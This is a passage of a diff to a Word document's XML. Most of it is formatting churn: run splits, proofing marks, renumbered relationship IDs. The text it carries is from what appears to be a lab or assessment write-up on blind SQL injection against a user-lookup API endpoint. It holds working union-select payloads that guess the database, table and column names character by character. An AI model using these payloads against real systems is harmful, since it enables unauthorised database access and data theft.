                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;close();</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>close(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10914,6 +11689,11 @@
       </w:tr>
     </w:tbl>
     <w:p/>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -10956,7 +11736,7 @@
                     <pic:cNvPicPr preferRelativeResize="0"/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId19"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -11076,7 +11856,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Each payload is placed at the end of the finding user API endpoint (</w:t>
       </w:r>
-      <w:hyperlink r:id="rId17" w:history="1">
+      <w:hyperlink r:id="rId20" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11272,7 +12052,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL,NULL --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,NULL --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11410,7 +12210,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL,NULL having</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,NULL having</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11453,7 +12273,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11471,7 +12311,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of database() correctly.</w:t>
+              <w:t xml:space="preserve">In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>database(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>) correctly.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11786,12 +12640,20 @@
               </w:rPr>
               <w:t xml:space="preserve">the value of </w:t>
             </w:r>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>database(),</w:t>
+              <w:t>database(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>),</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11864,7 +12726,107 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Secure' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11890,7 +12852,127 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,9)=BINARY 'Trainings' and table_name&lt;&gt;'testing' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Secure' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(table_name,1,9)=BINARY 'Trainings' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;&gt;'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11916,7 +12998,147 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,5)=BINARY 'Users' and table_name&lt;&gt;'testing' and table_name&lt;&gt;'Trainings' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Secure' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(table_name,1,5)=BINARY 'Users' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">&lt;&gt;'testing' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;&gt;'Trainings' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11941,7 +13163,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>n a), we do the same thing as step 2 to get the first table name of “Secure” from information_schema.</w:t>
+              <w:t xml:space="preserve">n a), we do the same thing as step 2 to get the first table name of “Secure” from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12107,8 +13343,29 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
-            </w:r>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12118,6 +13375,7 @@
               </w:rPr>
               <w:t>column_name</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12127,23 +13385,74 @@
               </w:rPr>
               <w:t xml:space="preserve"> from </w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns where table_name='Users'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> having substr(</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>='Users'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12181,6 +13490,7 @@
               </w:rPr>
               <w:t>)=BINARY '</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12190,6 +13500,7 @@
               </w:rPr>
               <w:t>api</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12222,7 +13533,147 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL, column_name from information_schema.columns where table_name='Users' having substr(column_name,1,2)=BINARY 'id' and column_name&lt;&gt;'api' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>column_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
